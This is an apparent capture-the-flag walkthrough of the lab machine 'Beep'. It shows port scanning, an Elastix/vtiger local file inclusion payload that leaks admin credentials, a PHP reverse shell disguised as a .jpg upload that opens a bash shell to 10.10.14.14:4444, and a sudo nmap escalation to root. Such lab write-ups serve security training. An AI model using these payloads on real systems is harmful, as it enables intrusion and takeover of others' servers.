Beep
Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.7 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Mon Jan 10 22:36:43 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.7
Warning: 10.10.10.7 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.7
Host is up (0.063s latency).
Not shown: 65352 closed tcp ports (reset), 167 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
877/tcp open unknown
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open unknown
10000/tcp open snet-sensor-mgmt
# Nmap done at Mon Jan 10 22:37:05 2022 -- 1 IP address (1 host up) scanned in 22.16 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan those ports more in depth and save the result into a file:
nmap -sC -sV -p22,25,80,110,111,143,443,877,993,995,3306,4190,4445,4559,5038,10000 10.10.10.7 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Jan 10 22:38:04 2022 as: nmap -sCV -p22,25,80,110,111,143,443,877,993,995,3306,4190,4445,4559,5038,10000 -oN targeted 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.059s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL PIPELINING APOP IMPLEMENTATION(Cyrus POP3 server v2) STLS TOP USER LOGIN-DELAY(0) RESP-CODES EXPIRE(NEVER)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 874/udp status
|_ 100024 1 877/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: NO ATOMIC ID CATENATE LITERAL+ OK RENAME SORT=MODSEQ Completed IMAP4 THREAD=ORDEREDSUBJECT URLAUTHA0001 BINARY STARTTLS MULTIAPPEND CONDSTORE MAILBOX-REFERRALS QUOTA LIST-SUBSCRIBED UIDPLUS CHILDREN IDLE LISTEXT ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte SORT ACL X-NETSCAPE IMAP4rev1 UNSELECT NAMESPACE
443/tcp open ssl/https?
|_ssl-date: 2022-01-10T22:41:29+00:00; +1h00m00s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
877/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 10 22:44:34 2022 -- 1 IP address (1 host up) scanned in 390.13 secondsSo it looks like we have a lot of information, let's go step by step. We know there is an HTTP server running on port 80. Let's take a look at it with the whatweb tool.
whatweb http://10.10.10.7
http://10.10.10.7 [302 Found] Apache[2.2.3], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], IP[10.10.10.7], RedirectLocation[https://10.10.10.7/], Title[302 Found]
ERROR Opening: https://10.10.10.7/ - SSL_connect returned=1 errno=0 state=error: dh key too smallSo, it looks like we are getting redirected to the HTTPS web page. If we search for the website on our browser, we should see a login page by elastix.
Time to look for any common exploits. I searched for elastix with the searchsploit tool and I got some exploits.
searchsploit elastix
--------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.py
--------------------------------------------------------------- ---------------------------------There is a Local File Inclusion exploit which could work. Let's take a look at it.
searchsploit -x php/webapps/37637.pl
#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&actionIf you append the LFI exploit path to https://10.10.10.7 , you should be able to get the /etc/amportal.con file. We also could see other interesting files sush as /etc/passwd.
It looks a bit messy. If we press Ctrl+U in order to view the source code, you should see the text a bit more organized.
And look at that! We got the user admin and the password jEhdIekWmdjE.
Exploitation
At this point, there are various ways to get a shell. From logging in via ssh, to doing a shellshock attack, to taking advantage of crontab tasks via webmin, and many more.
I will be exploiting the vtiger CRM.
Let's use gobuster to list directories on the website.
gobuster dir -u http://10.10.10.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -k
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.-kskips TLS certificate verification.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.7
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/17 20:37:18 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/modules (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/mail (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/help (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/static (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/admin (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/themes (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/lang (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/var (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/panel (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/libs (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/recordings (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/configs (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/vtigercrm (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]
===============================================================
2022/01/17 21:00:26 Finished
===============================================================We get a lot of directories. If we go to the /vtigercrm directory, we should see another login page. Let's try the credentials we found earlier.
And we got in!
To spawn a reverse shell, we will have to go to Settings > Module Manager > Company Details.
Now we are going to create a PHP file that runs at a system level a command that sends our netcat listener a shell. Then we are going to rename the PHP file with the .jpg extension, so that the CRM will accept it. The file should look like this:
// shell.php.jpg
<?php
system('bash -i >& /dev/tcp/10.10.14.14/4444 0>&1');
?>Then we upload the file into the Company Logo field.
Before hitting Save, we have to set out netcat listener.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now, if we hit send, we should get the reverse shell as the user asterisk and we could grab the user flag.
listening on [any] 4444 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.7] 60860
bash: no job control in this shell
bash-3.2$ whoami
asterisk
cat /home/fanis/user.txt
cc9af475a7c3c3a9368515213aba4080Privilege Escalation
Let's start the privilege escalation phase listing the sudo privileges of the asterisk user.
sudo -l
-llist user privileges.
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helperSo the user asterisk can run quite a few binaries as sudo.
If we search for nmap in the GTFOBins list, we can see that we can spawn a shell as root with the sudo privilege running the following command:
sudo nmap --interactive
nmap> !/bin/bash
And that's right, we get a shell as the root user. All we have to do now is reap the harvest and grab the root flag.
whoami
root
cat /root/root.txt
00e47778ed36a9508c16a80bb78d3696Last updated
Was this helpful?